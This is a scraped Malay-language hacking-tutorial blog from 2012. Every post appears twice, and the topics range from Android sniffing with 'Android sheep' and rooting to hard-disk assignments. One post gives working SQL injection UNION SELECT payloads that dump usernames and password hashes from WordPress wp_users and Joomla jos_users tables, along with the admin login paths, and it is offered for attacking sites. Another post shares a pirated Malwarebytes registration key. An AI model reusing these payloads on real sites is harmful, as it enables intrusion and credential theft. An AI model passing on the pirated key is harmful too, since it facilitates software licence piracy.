Tuesday, July 31, 2012

Cara Sniffing Mengunakan Andriod

http://1.bp.blogspot.com/_5bdO0FMWXa8/TH1Qb_s8fXI/AAAAAAAAAL4/sTx82a4vsuE/s1600/C:%5Cfakepath%5Candroid.jpg

Salam Sejahtera

Hari ni seth nak kongsi tutorial daripada kawan seth Prince kirara atau mudah dikenali dengan nama jax . Cara sniffing mengunakan andriod sheep . Pertama sekali korang kena root korang punya andriod sebelum korang install andriod sheep ni . macam mana nak root andriod korang ?

Rujuk link sini k :

http://h4ckingtutors.blogspot.com/2012/07/cara-untuk-root-andriod-device.html

Ok. korang Boleh rujuk video ni k .

Video 1 :



Video 2 :



Video 3 :



Download Disini


Tutorial dari prince kira dan prince kirara dan diubah suai untuk mudah difahami.
http://1.bp.blogspot.com/_5bdO0FMWXa8/TH1Qb_s8fXI/AAAAAAAAAL4/sTx82a4vsuE/s1600/C:%5Cfakepath%5Candroid.jpg

Salam Sejahtera

Hari ni seth nak kongsi tutorial daripada kawan seth Prince kirara atau mudah dikenali dengan nama jax . Cara sniffing mengunakan andriod sheep . Pertama sekali korang kena root korang punya andriod sebelum korang install andriod sheep ni . macam mana nak root andriod korang ?

Rujuk link sini k :

http://h4ckingtutors.blogspot.com/2012/07/cara-untuk-root-andriod-device.html

Ok. korang Boleh rujuk video ni k .

Video 1 :



Video 2 :



Video 3 :



Download Disini


Tutorial dari prince kira dan prince kirara dan diubah suai untuk mudah difahami.

Saturday, July 28, 2012

Cara Untuk Root Andriod device

Salam Sejahtera

Hari ni seth nak ajar korang cara nak "Rott"kan andriod korang .

ok. kita akan menggunakan application yang bernama "SuperOneClick". application ni berfungsi untuk "root" korang punya andriod dengan automatik .

Pertama sekali korang download SuperOneClick ni dekat website dia sendiri yang beralamat di :shortfuse.org,

OK. korang download versi yang latest . supaya ada bug yang telah diperbaiki.

Seepas korang download korang klik pada SuperOneClick.exe application.

(rujuk gambar dibawah)

Selepas itu korang tekan pada root dan nanti dia akan melakukan kerja yang seterusnya
(Rujuk gambar dibawah)



Selepas itu dia akan rooting korang punya device . kalau ada apa apa installation korang klik ok je . korang jangan pulak takut . sebab application ni dah setting dengan baik .

Maka hasilnya nanti akan menjadi :


Itu sahaja. Andriod korang telah pun di rooting sepenunya .

nanti akan keluar test untuk superuser . korang klik allow dan siap !

Itu sahaja . happy rooting . share ok .
Salam Sejahtera

Hari ni seth nak ajar korang cara nak "Rott"kan andriod korang .

ok. kita akan menggunakan application yang bernama "SuperOneClick". application ni berfungsi untuk "root" korang punya andriod dengan automatik .

Pertama sekali korang download SuperOneClick ni dekat website dia sendiri yang beralamat di :shortfuse.org,

OK. korang download versi yang latest . supaya ada bug yang telah diperbaiki.

Seepas korang download korang klik pada SuperOneClick.exe application.

(rujuk gambar dibawah)

Selepas itu korang tekan pada root dan nanti dia akan melakukan kerja yang seterusnya
(Rujuk gambar dibawah)



Selepas itu dia akan rooting korang punya device . kalau ada apa apa installation korang klik ok je . korang jangan pulak takut . sebab application ni dah setting dengan baik .

Maka hasilnya nanti akan menjadi :


Itu sahaja. Andriod korang telah pun di rooting sepenunya .

nanti akan keluar test untuk superuser . korang klik allow dan siap !

Itu sahaja . happy rooting . share ok .

Kenali Wordpress dan joomla Untuk Sqli Injection

Salam sejahtera

Hari ni seth nak kongsi satu benda berkenaan dengan SQli yang ada di wordpress dan Joomla .
Sebenarnya banyak lagi bug yang terdapat di server Wordpress dan Joomla ini.

Contohnya : Arbitrary file Uploads , File Upload Vulnerablities , http Header Bugs . Xss .
kalau korang nak tahu . korang google satu satu keyword dekat atas .

Ok .

1:Wordpress

Seth nak terangkan Database untuk wordpress dahulu .

(Gambar Di atas adalah Database website ber"platform" Wordpress)

Sekarang kita akan berfikir logik untuk mencari username jika mengunakan SQLI .

Wp_User : Username dan password Disimpan

Contoh adalah :

Http://[localhost]/index.php?/p?=2


pada perimeter "p?=2" terdedah kepada Sqli injection . maka masukan exploit wordpress .

union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


Maka akan Menjadi :

Http://[localhost]/index.php?/p?=-2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_ass),7,8,9+from+wp_user--


Nanti akan keluar username dan password untuk website wordpress itu tadi .

Jangan Lupa tambah : "- dan + sebelum Exploit. Rujuk warna Merah Di atas .

Htpp://[localhost]/wp_admin/ - /wp_login.php : Halaman Admin


2:Joomla

Jom kita tengok database Joomla .
(Sila Rujuk Penerangan Di Atas untuk Jomla)


Jos_Users : Username dan password Disimpan .

Http://[localhost]/index.php?option=view=saya=2


Exploit :

+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--


Contoh:

Http://[localhost]/index.php?option=view=saya=-2+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4
,5,6,7,8,9,10+from+jos_users--


Http://[localhost]/administrator : Halaman Admin

itu sahaja .

Share ok .







Salam sejahtera

Hari ni seth nak kongsi satu benda berkenaan dengan SQli yang ada di wordpress dan Joomla .
Sebenarnya banyak lagi bug yang terdapat di server Wordpress dan Joomla ini.

Contohnya : Arbitrary file Uploads , File Upload Vulnerablities , http Header Bugs . Xss .
kalau korang nak tahu . korang google satu satu keyword dekat atas .

Ok .

1:Wordpress

Seth nak terangkan Database untuk wordpress dahulu .

(Gambar Di atas adalah Database website ber"platform" Wordpress)

Sekarang kita akan berfikir logik untuk mencari username jika mengunakan SQLI .

Wp_User : Username dan password Disimpan

Contoh adalah :

Http://[localhost]/index.php?/p?=2


pada perimeter "p?=2" terdedah kepada Sqli injection . maka masukan exploit wordpress .

union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


Maka akan Menjadi :

Http://[localhost]/index.php?/p?=-2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_ass),7,8,9+from+wp_user--


Nanti akan keluar username dan password untuk website wordpress itu tadi .

Jangan Lupa tambah : "- dan + sebelum Exploit. Rujuk warna Merah Di atas .

Htpp://[localhost]/wp_admin/ - /wp_login.php : Halaman Admin


2:Joomla

Jom kita tengok database Joomla .
(Sila Rujuk Penerangan Di Atas untuk Jomla)


Jos_Users : Username dan password Disimpan .

Http://[localhost]/index.php?option=view=saya=2


Exploit :

+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--


Contoh:

Http://[localhost]/index.php?option=view=saya=-2+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4
,5,6,7,8,9,10+from+jos_users--


Http://[localhost]/administrator : Halaman Admin

itu sahaja .

Share ok .







Tuesday, July 24, 2012

Fungsi Pendrive

Salam Sejahtera

Hari ni seth nak kongsi lagi satu assigment seth . Fungsi Pendrive

Fungsi/Kegunaan Pendrivehttp://2.bp.blogspot.com/-s2BOqFqcny0/TcoahWK6upI/AAAAAAAAAB4/uxl6oilfBxA/s1600/pen-drive.jpg

Selain menyimpan data dalam pemacu simpanan dan mudah alih (USB Pen Drive), apakah fungsi lain yang boleh dilakukan? Pada hari ini USB Pen Drive atau Cakera Flash USB mengambil alih peranan disket yang suatu ketika dahulu di gunakan sebagai tempat simpanan data luaran yang mudah di bawa ke mana-mana. USB Pen Drive mempunyai kapasiti yang lebih tinggi daripada disket dan bentuk fizikalnya juga lebih kecil dan ringan berbanding disket. Dalam dunia teknologi maklumat hari ini, ia merupakan alat yang sangat penting dalam kehidupan seharian kita sama ada untuk pekerjaan atau sebagainya.

Malah dengan rupa bentuk yang pelbagai dan menarik, dijadikan sebagai sebahagian fesyen kepada seseorang. Apa yang lebih menarik ialah peranan Cakera Flash USB ini bukan sahaja untuk penyimpanan data semata-mata tetapi terdapat kegunaan-kegunaan yang lain.

Huraian:

• Ia boleh digunakan untuk melarikan program-program komputer secara terus daripadanya seperti OpenOffice, Mozilla Firefox dan lain-lain. Program-program komputer ini boleh dipilih oleh anda untuk memasangkannya kepada Cakera Flash USB tersebut. Sila lawati laman wen Portable Apps.com untuk mengetahui faedah ini.

• Sekiranya anda mahu Cakera Flash USB ini berfungsi lebih daripada melarikan program-program komputer, maka ia perlu berupaya melarikan sistem pengoperasian. Ini boleh lakukan sama ada anda mahu larikan sistem pengoperasian Windows atau Linux. Konfigurasinya agar rumit tapi anda boleh dapati manualnya di Internet.

• Cakera Flash USB juga boleh dijadikan alat untuk sambungan tanpa wayar dengan menggunakan fungsi konfigurasi sambungan tanpa wayar yang ada dalam Windows dan menyimpan salinan konfigurasi sambungan wayar itu ke dalamnya.

• Ia juga boleh digunakan untuk dijadikan sebagai alat mereset kata laluan bagi Windows.

Copy paste dari google dari sumber yang berlainan

Salam Sejahtera

Hari ni seth nak kongsi lagi satu assigment seth . Fungsi Pendrive

Fungsi/Kegunaan Pendrivehttp://2.bp.blogspot.com/-s2BOqFqcny0/TcoahWK6upI/AAAAAAAAAB4/uxl6oilfBxA/s1600/pen-drive.jpg

Selain menyimpan data dalam pemacu simpanan dan mudah alih (USB Pen Drive), apakah fungsi lain yang boleh dilakukan? Pada hari ini USB Pen Drive atau Cakera Flash USB mengambil alih peranan disket yang suatu ketika dahulu di gunakan sebagai tempat simpanan data luaran yang mudah di bawa ke mana-mana. USB Pen Drive mempunyai kapasiti yang lebih tinggi daripada disket dan bentuk fizikalnya juga lebih kecil dan ringan berbanding disket. Dalam dunia teknologi maklumat hari ini, ia merupakan alat yang sangat penting dalam kehidupan seharian kita sama ada untuk pekerjaan atau sebagainya.

Malah dengan rupa bentuk yang pelbagai dan menarik, dijadikan sebagai sebahagian fesyen kepada seseorang. Apa yang lebih menarik ialah peranan Cakera Flash USB ini bukan sahaja untuk penyimpanan data semata-mata tetapi terdapat kegunaan-kegunaan yang lain.

Huraian:

• Ia boleh digunakan untuk melarikan program-program komputer secara terus daripadanya seperti OpenOffice, Mozilla Firefox dan lain-lain. Program-program komputer ini boleh dipilih oleh anda untuk memasangkannya kepada Cakera Flash USB tersebut. Sila lawati laman wen Portable Apps.com untuk mengetahui faedah ini.

• Sekiranya anda mahu Cakera Flash USB ini berfungsi lebih daripada melarikan program-program komputer, maka ia perlu berupaya melarikan sistem pengoperasian. Ini boleh lakukan sama ada anda mahu larikan sistem pengoperasian Windows atau Linux. Konfigurasinya agar rumit tapi anda boleh dapati manualnya di Internet.

• Cakera Flash USB juga boleh dijadikan alat untuk sambungan tanpa wayar dengan menggunakan fungsi konfigurasi sambungan tanpa wayar yang ada dalam Windows dan menyimpan salinan konfigurasi sambungan wayar itu ke dalamnya.

• Ia juga boleh digunakan untuk dijadikan sebagai alat mereset kata laluan bagi Windows.

Copy paste dari google dari sumber yang berlainan

Fungsi Hard Disk

Salam Sejahtera


Hari ni seth nak kongsi assigment seth. dan inilah hasilnya .


http://static.ddmcdn.com/gif/adding-a-hard-disk-1-1.jpg



Fungsi /kegunaan Hardisk

  • Harddisk merupakan ruang simpan utama di dalam sebuah computer. Di situ seluruh sistem operasi dan kerja penyimpanan dijalankan, setiap data dan informasi disimpan.
  • Dalam satu harddisk, terdapat berbagai macam folder (,\ subdirektori, subfolder), yang masing-masing dikelompokkan berdasarkan fungsi dan kegunaannya. Di situlah data-data diletakkan.
  • Ruang kecil dalam harddisk bekerja dan berkerjasama (interdependent). Data/info dalam satu ruang kadangkala diperlukan untuk menggerakkan data/ info yang berada di ruang lain. Ada ruang di dalamnya tidak boleh ditukar-tukar atau dipindahkan ke tempat lain, ada ruang di mana kita boleh membuang dan memasukan data secara berganti sesuai dengan keperluan kita.
  • Harddisk terdiri atas beberapa komponen penting. Komponen utamanya adalah plat yang berfungsi sebagai penyimpan data. Plat ini adalah satu cakera padat yang berbentuk bulat , kedua sisi di atasnya dilapisi dengan material sehingga memiliki pola-pola magnet. plat ini ditempatkan dalam suatu kedudukan yang disebut spindle.

Huraian:

Fungsi utamanya sebagai media penyimpanan atau storage data secara permanent.
Hard disk menyimpan bermacam-macam info, salah satunya info mengenai hardware yang ada di dalam PC tersebut, dan OS itu sendiri. Hard disk merupakan salah satu komponen yang menentukan kerja PC. Semakin cepat hard disk bekerja, semakin cepat pula transfer yang dihasilkan. Hard disk IDE mempunyai 4 tingkatan kelas, masing-masing Ultra DMA/33, Ultra DMA/66, Ultra/100, dan Ultra DMA/133. DMA singkatan dari Direct Memory Access yang berfungsi untuk meningkatkan transfer data. Maksud Ultra DMA/33 adalah daya transfer rata-ratanya 33 MBps. Jadi,Ultra DMA/133 sama dengan transfer datanya 133 MBps. IDE yang terbaru menggunakan SATA {serial ATA} yang sebelumnya menggunakan paralel ATA. Penggunaan hard disk jenis SATA kecepatan transfernya lebih cepat daripada paralel ATA.

Hard disk lambat laun mengalami peningkatan dalam hal kapasiti penyimpanan data. Pada masa Windows 3.1, penggunaan hard disk dengan ukuran 300 MB sudah cukup. Pada Windows 98,hard disk dengan ukuran 8.3 GB sudah lebih dari cukup. Untuk pemakaian hard disk yang intensif, ukuran tersebut sangat kurang, apalagi menggunakan OS yang baru dan program yang baru pula. Mungkin untuk ukuran standar, hard disk yang dipakai sekarang adalah 160 GB atau lebih tergantung kepada keperluan anda.

Kecepatan putaran hard disk bermacam-macam, antara lain 5400 RPM, 7200 RPM, atau lebih. Putaran yang dihasilkan hard disk yang memiliki RPM 7200 lebih bising daripada 5400 RPM, akibatnya hard disk menjadi lebih cepat panas. Anda memerlukan kipas pendingin untuk mendinginkan dan menjaga peranti ini dapat hidup bertahan lama.
Demikianlah penjelasan dari saya tentang Hardisk


Copy paste from google dari sumber yang berlainan

Salam Sejahtera


Hari ni seth nak kongsi assigment seth. dan inilah hasilnya .


http://static.ddmcdn.com/gif/adding-a-hard-disk-1-1.jpg



Fungsi /kegunaan Hardisk

  • Harddisk merupakan ruang simpan utama di dalam sebuah computer. Di situ seluruh sistem operasi dan kerja penyimpanan dijalankan, setiap data dan informasi disimpan.
  • Dalam satu harddisk, terdapat berbagai macam folder (,\ subdirektori, subfolder), yang masing-masing dikelompokkan berdasarkan fungsi dan kegunaannya. Di situlah data-data diletakkan.
  • Ruang kecil dalam harddisk bekerja dan berkerjasama (interdependent). Data/info dalam satu ruang kadangkala diperlukan untuk menggerakkan data/ info yang berada di ruang lain. Ada ruang di dalamnya tidak boleh ditukar-tukar atau dipindahkan ke tempat lain, ada ruang di mana kita boleh membuang dan memasukan data secara berganti sesuai dengan keperluan kita.
  • Harddisk terdiri atas beberapa komponen penting. Komponen utamanya adalah plat yang berfungsi sebagai penyimpan data. Plat ini adalah satu cakera padat yang berbentuk bulat , kedua sisi di atasnya dilapisi dengan material sehingga memiliki pola-pola magnet. plat ini ditempatkan dalam suatu kedudukan yang disebut spindle.

Huraian:

Fungsi utamanya sebagai media penyimpanan atau storage data secara permanent.
Hard disk menyimpan bermacam-macam info, salah satunya info mengenai hardware yang ada di dalam PC tersebut, dan OS itu sendiri. Hard disk merupakan salah satu komponen yang menentukan kerja PC. Semakin cepat hard disk bekerja, semakin cepat pula transfer yang dihasilkan. Hard disk IDE mempunyai 4 tingkatan kelas, masing-masing Ultra DMA/33, Ultra DMA/66, Ultra/100, dan Ultra DMA/133. DMA singkatan dari Direct Memory Access yang berfungsi untuk meningkatkan transfer data. Maksud Ultra DMA/33 adalah daya transfer rata-ratanya 33 MBps. Jadi,Ultra DMA/133 sama dengan transfer datanya 133 MBps. IDE yang terbaru menggunakan SATA {serial ATA} yang sebelumnya menggunakan paralel ATA. Penggunaan hard disk jenis SATA kecepatan transfernya lebih cepat daripada paralel ATA.

Hard disk lambat laun mengalami peningkatan dalam hal kapasiti penyimpanan data. Pada masa Windows 3.1, penggunaan hard disk dengan ukuran 300 MB sudah cukup. Pada Windows 98,hard disk dengan ukuran 8.3 GB sudah lebih dari cukup. Untuk pemakaian hard disk yang intensif, ukuran tersebut sangat kurang, apalagi menggunakan OS yang baru dan program yang baru pula. Mungkin untuk ukuran standar, hard disk yang dipakai sekarang adalah 160 GB atau lebih tergantung kepada keperluan anda.

Kecepatan putaran hard disk bermacam-macam, antara lain 5400 RPM, 7200 RPM, atau lebih. Putaran yang dihasilkan hard disk yang memiliki RPM 7200 lebih bising daripada 5400 RPM, akibatnya hard disk menjadi lebih cepat panas. Anda memerlukan kipas pendingin untuk mendinginkan dan menjaga peranti ini dapat hidup bertahan lama.
Demikianlah penjelasan dari saya tentang Hardisk


Copy paste from google dari sumber yang berlainan

Saturday, July 21, 2012

Baca Tutorial-Tutorial Yang Lepas ?


Salam Sejahtera

Hari ni saya nak kongsi dengan korang semua tentang tutorial tutorial yang lepas berkenaan cara hacking dan cara meng"exploitasi" sesuatu sistem

Munkin ada tutorial-tutorial yang lama tapi berguna buat anda ada di bahagian belakang psot blog ini ,

korang boleh rujuk tutorial tutorial yang lepas dengan mengunakan Google Dork .

site:blogspot.com h4ckingtutors

Pergi ke page seterusnya dan Cari tutorial yang korang mahukan .

Jika korang nak request tutorial sila Email kepada saya di :

Killmy99@gmail.com

atau chat dengan saya di facebook .

Itu sahaja . Like dan share .

Salam Sejahtera

Hari ni saya nak kongsi dengan korang semua tentang tutorial tutorial yang lepas berkenaan cara hacking dan cara meng"exploitasi" sesuatu sistem

Munkin ada tutorial-tutorial yang lama tapi berguna buat anda ada di bahagian belakang psot blog ini ,

korang boleh rujuk tutorial tutorial yang lepas dengan mengunakan Google Dork .

site:blogspot.com h4ckingtutors

Pergi ke page seterusnya dan Cari tutorial yang korang mahukan .

Jika korang nak request tutorial sila Email kepada saya di :

Killmy99@gmail.com

atau chat dengan saya di facebook .

Itu sahaja . Like dan share .

Cara View Hidden Folder Di Dalam Windows 7

Salam Sejahtera

Hari ni saya nak ajar korang cara view hidden folder di dalam Windows 7 .

jika korang mengunakan windows xp munkin sedikit berbeza cara caranya .

bagaimana hendak view hidden folder di dalam Windows 7 ?

Ok . ertama sekali korang tekan start dan pergi ke Computer.


Selepas korang masuk ke Computer korang klik pada "Organize" pada atas sekali di bahagian kiri . (Rujuk Gambar Dibawah)

Selepas itu korang klik pada "Search And Folder Option" nanti korang akan jumpa satu sub windows yang akan keluar.




Pertama sekali korang klik pada nombor 1 itu . (Rujuk Gambar Diatas) yang bertulis "View"

Selepas itu korang akan nampak pilihan seperti nombor 2 (Rujuk Gambar Dibawah)

Di akan beri dua pilihan .

Don"t Show Hidden Files Folders , or Driver
Show Hidden Files Folders , or Driver


Korang klik pada :

Show Hidden Files Folders , or Driver .

Dan semua file yang di hidden akan terpapar . itu sahaja . like dan share




Salam Sejahtera

Hari ni saya nak ajar korang cara view hidden folder di dalam Windows 7 .

jika korang mengunakan windows xp munkin sedikit berbeza cara caranya .

bagaimana hendak view hidden folder di dalam Windows 7 ?

Ok . ertama sekali korang tekan start dan pergi ke Computer.


Selepas korang masuk ke Computer korang klik pada "Organize" pada atas sekali di bahagian kiri . (Rujuk Gambar Dibawah)

Selepas itu korang klik pada "Search And Folder Option" nanti korang akan jumpa satu sub windows yang akan keluar.




Pertama sekali korang klik pada nombor 1 itu . (Rujuk Gambar Diatas) yang bertulis "View"

Selepas itu korang akan nampak pilihan seperti nombor 2 (Rujuk Gambar Dibawah)

Di akan beri dua pilihan .

Don"t Show Hidden Files Folders , or Driver
Show Hidden Files Folders , or Driver


Korang klik pada :

Show Hidden Files Folders , or Driver .

Dan semua file yang di hidden akan terpapar . itu sahaja . like dan share




Download Malwarebytes./ Full dengan serial key

Kali nie Wan nak share skit mengenai software yang Wan guna..Bukan software untuk edit Gambar or blog..Tapi untuk perlindungan Laptop or PC korang..Wan guna nie koz memang terbaik.Korang yang kaki Blogwalking tu leh guna nie k..bab malware or adware nie boleh membiak dalam lapyop/PC korang tanpa korang sedar..AntiVirus tak leh detect Malware taw..Jangan sangka korang guna Antivirus laptop or PC korang dah selamat...So Law korang nak...Korang klik Download kat bawah nie...Dan lepas tu Save k..And Software nie gak leh block malware dari blog blog yang kene jangkitan malware..

Download malware Bytes di SINI

Lepas korang Save tu..Korang install lah..Lepas install korang open Malware Byte korang tu..Dan nanti korang akan dapat trial punya version..Macam dalam gambar kat bawah nie..

Trial nie pun ok gak..Cuma dia trial lah..Tapi korang tetap leh guna..Dan skang nie sapa cepat dia lah yang dapat guna REG KEY Wan nie..Wan tak taw berapa banyak yang boleh guna ..Korang cuba je..Korang klik kat anak panah macam kat dalam gambar kat atas tu..Nanti korang akan nampak satu Pop Up muncul taw..Korang masukkan REG key kat bawah nie dalam kotak dia nanti k..Law tak leh guna korang beli lah REG KEY sendiri k..hehehe




Kotak atas : 3AH34

Kotak bawah: Q5VP-GUTV-84HV-UWNN




Law leh guna ... korang akan dapat full version lah..Nanti akan dapat macam kat bawh nie..Takde lagi dah REG Button ..

So selamat menggunakan MalwareByte..Sesape yang dapat guna KEY REG tu..Korang kasi taw k.Sila Scan laptop or PC korang k...

Credit untuk my member Wan hazel untuk artikel ini .

jum terjah blog beliau .
Kali nie Wan nak share skit mengenai software yang Wan guna..Bukan software untuk edit Gambar or blog..Tapi untuk perlindungan Laptop or PC korang..Wan guna nie koz memang terbaik.Korang yang kaki Blogwalking tu leh guna nie k..bab malware or adware nie boleh membiak dalam lapyop/PC korang tanpa korang sedar..AntiVirus tak leh detect Malware taw..Jangan sangka korang guna Antivirus laptop or PC korang dah selamat...So Law korang nak...Korang klik Download kat bawah nie...Dan lepas tu Save k..And Software nie gak leh block malware dari blog blog yang kene jangkitan malware..

Download malware Bytes di SINI

Lepas korang Save tu..Korang install lah..Lepas install korang open Malware Byte korang tu..Dan nanti korang akan dapat trial punya version..Macam dalam gambar kat bawah nie..

Trial nie pun ok gak..Cuma dia trial lah..Tapi korang tetap leh guna..Dan skang nie sapa cepat dia lah yang dapat guna REG KEY Wan nie..Wan tak taw berapa banyak yang boleh guna ..Korang cuba je..Korang klik kat anak panah macam kat dalam gambar kat atas tu..Nanti korang akan nampak satu Pop Up muncul taw..Korang masukkan REG key kat bawah nie dalam kotak dia nanti k..Law tak leh guna korang beli lah REG KEY sendiri k..hehehe




Kotak atas : 3AH34

Kotak bawah: Q5VP-GUTV-84HV-UWNN




Law leh guna ... korang akan dapat full version lah..Nanti akan dapat macam kat bawh nie..Takde lagi dah REG Button ..

So selamat menggunakan MalwareByte..Sesape yang dapat guna KEY REG tu..Korang kasi taw k.Sila Scan laptop or PC korang k...

Credit untuk my member Wan hazel untuk artikel ini .

jum terjah blog beliau .

Cara mempercepatkan Proses Shutdown Windows Xp ./ etc

Salam Sejahtera

Hari ni saya nak ajar korang cara nak cepatkan masa untuk shutdown Windows xp dan Vista .

Munkin korang pernah tengok windows 7 . apabila shutdown kadar yang diperlukan pendek sahaja . sama seperti sistem operasi linux . tetapi linux mempunyai kecepatan untuk shutdown dengan lebih laju .

Bagaimana korang nak menukar setting pada windows korang supaya shutdown dengan lebih laju ?

ok . Pertama korang perlu membuka Run untuk mendapat regedit tab .

Start > Run > Regedit > Enter

Start > Regedit > Enter

Selepas itu korang masuk ke :

HKEY-LOCAL_MACHINE > SYSTEM > ControlSet001 > Control

Selpas itu korang right klik pada "WaitToKillServiceTimeOut"

Nilainya yang diberikan adalah 12.000 , korang tukar kepada 4000.
(Rujuk gambar Dibawah)


Selepas itu korang klik ok . dan restart .

tested on windows xp dan berjalan lancar .
Salam Sejahtera

Hari ni saya nak ajar korang cara nak cepatkan masa untuk shutdown Windows xp dan Vista .

Munkin korang pernah tengok windows 7 . apabila shutdown kadar yang diperlukan pendek sahaja . sama seperti sistem operasi linux . tetapi linux mempunyai kecepatan untuk shutdown dengan lebih laju .

Bagaimana korang nak menukar setting pada windows korang supaya shutdown dengan lebih laju ?

ok . Pertama korang perlu membuka Run untuk mendapat regedit tab .

Start > Run > Regedit > Enter

Start > Regedit > Enter

Selepas itu korang masuk ke :

HKEY-LOCAL_MACHINE > SYSTEM > ControlSet001 > Control

Selpas itu korang right klik pada "WaitToKillServiceTimeOut"

Nilainya yang diberikan adalah 12.000 , korang tukar kepada 4000.
(Rujuk gambar Dibawah)


Selepas itu korang klik ok . dan restart .

tested on windows xp dan berjalan lancar .

H4ckingtutors mendapat SiteLink dari google

Salam sejahtera

Hari ni saya nak kongsikan berkenaan dengan blog ini yang mendapat site link dari google .
Saya akan cuba untuk update news yang terbaru kepada pembaca pembaca yang setia untuk blog ini . saya akan cuba untuk menyusun tutorial tutorial untuk korang semua .

Dulu saya juga pernah berhasrat untuk menukar domain Blog ini ke domain .com tanpa ada "blogspot", tapi rakan saya pernah berkata . munkin rangkin alexa akan turun dan ranking akan bermula dari "No Data" jadi saya hanya akan mengunakan .Blogspot.com sahaja buat masa ini .

Dan ingin dinyatakan disini bahawa segala tutorial di dalam ini adalah di tulis saya sendiri dan ada juga dipetik dari blog rakan saya yang lain . jadi segala dan korang lakukan tidak akan kena mengena dengan saya . harap maklum .

Bukan hendak menunjuk dada . tapi ini hasil dari penat saya menulis dan kesetiaan korang untuk menbaca . terima kasih saya ucapkan .

Dan petikan ini dipetik dari Suffer berkenaan dengan google siteLink


So, Apa itu Google Sitelinks? Menurut ishakhasimi.com, sitelinks adalah links-links dibawah nama blog atau web yang muncul di hasil carian Google,sitelinks ini sebenarnya untuk pengetahuan rakan-rakan blogger akan dihasilkan secara automatik,jika sebuah blog atau web memenuhi algoritma sitelinks yang dimiliki oleh google. Sitelinks diberikan kepada sebuah blog atau web agar pengguna lebih mudah menavigasi sebuah blog atau web.

Bagaimana nak mendapatkan Google Sitelinks pada sesuatu blog atau website? Sebenarnya ramai blogger yang berpendapat Google Tidak Menjelaskan Bagaimana Kita Boleh Mendapatkan Sitelinks. Namun berikut merupakan terjemahan petikan dari blog agusale.com (Indonesia) mengenai kelebihan yang perlu ada pada sesuatu blog atau website bagi memiliki Google Sitelinks ;

1. Blog atau website yang mendapat kedudukan teratas bagi sesuatu carian Google.
2. Blog atau website mudah diakses oleh spider.
3. Blog atau website mengalami aliran traffic yang tinggi.
4. Mempunyai high natural search traffic.
5. Outbound links yang useful.
6. Inbound link dari site berkualiti tinggi (bertraffic tinggi).
7. Blog atau website yang berusia setahun atau lebih.

So, Apa pula kelebihan memiliki Google Sitelinks pada sesuatu blog atau website? Sudah semestinya visitor lebih mudah untuk mencari blog atau website tersebut dari carian Google. Malah peratus carian oleh spider-spider Google akan lebih tinggi. Kalau korang perasan bukan semua Google Sitelinks pada sesuatu blog atau website mempunyai jumlah bilangan link yang sama. Ia mengikut traffic sesuatu entri, ada yang 3 links, ada yang 6 links, ada juga 8 links seperti Blog Kapal Karam ni.

Tapi perlu diingat, Google Sitelink juga sama seperti seperti pagerank iaitu sentiasa di update oleh Google. Links pada Google Sitelink berkemungkinan akan bertambah, berkurang mahupun hilang jika blog yang dinilai itu tidak diupdate. Aku harapkan informasi ini berguna untuk semua.
Salam sejahtera

Hari ni saya nak kongsikan berkenaan dengan blog ini yang mendapat site link dari google .
Saya akan cuba untuk update news yang terbaru kepada pembaca pembaca yang setia untuk blog ini . saya akan cuba untuk menyusun tutorial tutorial untuk korang semua .

Dulu saya juga pernah berhasrat untuk menukar domain Blog ini ke domain .com tanpa ada "blogspot", tapi rakan saya pernah berkata . munkin rangkin alexa akan turun dan ranking akan bermula dari "No Data" jadi saya hanya akan mengunakan .Blogspot.com sahaja buat masa ini .

Dan ingin dinyatakan disini bahawa segala tutorial di dalam ini adalah di tulis saya sendiri dan ada juga dipetik dari blog rakan saya yang lain . jadi segala dan korang lakukan tidak akan kena mengena dengan saya . harap maklum .

Bukan hendak menunjuk dada . tapi ini hasil dari penat saya menulis dan kesetiaan korang untuk menbaca . terima kasih saya ucapkan .

Dan petikan ini dipetik dari Suffer berkenaan dengan google siteLink


So, Apa itu Google Sitelinks? Menurut ishakhasimi.com, sitelinks adalah links-links dibawah nama blog atau web yang muncul di hasil carian Google,sitelinks ini sebenarnya untuk pengetahuan rakan-rakan blogger akan dihasilkan secara automatik,jika sebuah blog atau web memenuhi algoritma sitelinks yang dimiliki oleh google. Sitelinks diberikan kepada sebuah blog atau web agar pengguna lebih mudah menavigasi sebuah blog atau web.

Bagaimana nak mendapatkan Google Sitelinks pada sesuatu blog atau website? Sebenarnya ramai blogger yang berpendapat Google Tidak Menjelaskan Bagaimana Kita Boleh Mendapatkan Sitelinks. Namun berikut merupakan terjemahan petikan dari blog agusale.com (Indonesia) mengenai kelebihan yang perlu ada pada sesuatu blog atau website bagi memiliki Google Sitelinks ;

1. Blog atau website yang mendapat kedudukan teratas bagi sesuatu carian Google.
2. Blog atau website mudah diakses oleh spider.
3. Blog atau website mengalami aliran traffic yang tinggi.
4. Mempunyai high natural search traffic.
5. Outbound links yang useful.
6. Inbound link dari site berkualiti tinggi (bertraffic tinggi).
7. Blog atau website yang berusia setahun atau lebih.

So, Apa pula kelebihan memiliki Google Sitelinks pada sesuatu blog atau website? Sudah semestinya visitor lebih mudah untuk mencari blog atau website tersebut dari carian Google. Malah peratus carian oleh spider-spider Google akan lebih tinggi. Kalau korang perasan bukan semua Google Sitelinks pada sesuatu blog atau website mempunyai jumlah bilangan link yang sama. Ia mengikut traffic sesuatu entri, ada yang 3 links, ada yang 6 links, ada juga 8 links seperti Blog Kapal Karam ni.

Tapi perlu diingat, Google Sitelink juga sama seperti seperti pagerank iaitu sentiasa di update oleh Google. Links pada Google Sitelink berkemungkinan akan bertambah, berkurang mahupun hilang jika blog yang dinilai itu tidak diupdate. Aku harapkan informasi ini berguna untuk semua.

Monday, July 16, 2012

Cara Install Chilkat dalam Linux

Salam sejahtera

Hari ni seth nak kongsi satu benda yang menarik .
http://webdesignledger.com/wp-content/uploads/2010/04/script_fonts_11.jpg
Cara install chilkat di dalam Linux . apa itu chilkat ?

